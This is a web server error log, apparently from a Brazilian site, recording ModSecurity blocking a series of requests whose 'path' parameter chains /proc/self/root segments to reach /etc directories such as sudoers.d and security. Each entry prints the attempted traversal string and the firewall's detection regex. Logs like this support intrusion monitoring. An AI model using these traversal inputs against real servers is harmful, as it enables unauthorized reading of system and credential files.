https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:51.943238 2026] [:error] [pid 29802:tid 140411616036608] [client 74.7.243.203:35262] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha48_BxrYCr4hPDw_88QAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:53.370845 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:36670] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha5f9ocpUE4ed4uDwEdQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:54.403464 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.241.46:36020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha5lajLEzk2WiQ-10k8gAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:32:54.580953 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.243.203:36684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha5kr9dMAiw-8KANNYqwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:55.919967 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:36692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha59SswJuvopo3lOhxLwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:56.796856 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.241.46:36034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha6FajLEzk2WiQ-10k9AAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:32:58.222297 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:36700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha6v9ocpUE4ed4uDwEeQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:59.540366 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:36710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha67ABkC4fWIHEf8EFewAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:00.687405 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.243.203:55260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha7M_BxrYCr4hPDw_89AAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:02.366750 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.243.203:55274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha7Ur9dMAiw-8KANNYrgAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:03.851998 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.243.203:55282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha71ajLEzk2WiQ-10k9wAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:05.219044 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:55286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha8Y6lpbStxTqkSkt9GAAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:07.828806 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:55290] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha8qQpVkWug9HeOt9IHAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:09.193506 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.243.203:55306] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha9Ur9dMAiw-8KANNYsQAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:11.603011 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.243.203:54208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha98_BxrYCr4hPDw_8-gAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:12.918133 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:54210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha-LABkC4fWIHEf8EFgAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:15.585855 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:54214] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha-rysWC90G-1nBrBV_AAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:16.890946 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.243.203:54216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha_M_BxrYCr4hPDw_8_QAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:18.134247 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.243.203:54232] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha_qTCbgAP5jq5Teg-egAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:19.525415 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:54248] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha_6TCbgAP5jq5Teg-fwAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:20.720412 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:50340] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbAP9ocpUE4ed4uDwEiAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:22.029122 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:50344] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbAo6lpbStxTqkSkt9HgAAAk0"], referer: 